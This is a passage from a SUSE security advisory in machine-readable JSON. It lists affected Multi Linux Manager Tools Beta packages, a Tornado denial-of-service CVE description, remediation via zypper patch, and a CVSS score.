"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-defusedxml-0.7.1-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-rhnlib-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacecmd-5.2.6-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-30T11:21:20Z",
"details": "important"
}
],
"title": "CVE-2025-67725"
},
{
"cve": "CVE-2025-67726",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-67726"
}
],
"notes": [
{
"category": "general",
"text": "Tornado is a Python web framework and asynchronous networking library. Versions 6.5.2 and below use an inefficient algorithm when parsing parameters for HTTP header values, potentially causing a DoS. The _parseparam function in httputil.py is used to parse specific HTTP header values, such as those in multipart/form-data and repeatedly calls string.count() within a nested loop while processing quoted semicolons. If an attacker sends a request with a large number of maliciously crafted parameters in a Content-Disposition header, the server\u0027s CPU usage increases quadratically (O(n^2)) during parsing. Due to Tornado\u0027s single event loop architecture, a single malicious request can cause the entire server to become unresponsive for an extended period. This issue is fixed in version 6.5.3.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-defusedxml-0.7.1-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-rhnlib-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacecmd-5.2.6-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-67726",
"url": "https://www.suse.com/security/cve/CVE-2025-67726"
},
{
"category": "external",
"summary": "SUSE Bug 1254904 for CVE-2025-67726",
"url": "https://bugzilla.suse.com/1254904"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-defusedxml-0.7.1-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-rhnlib-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacecmd-5.2.6-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64",
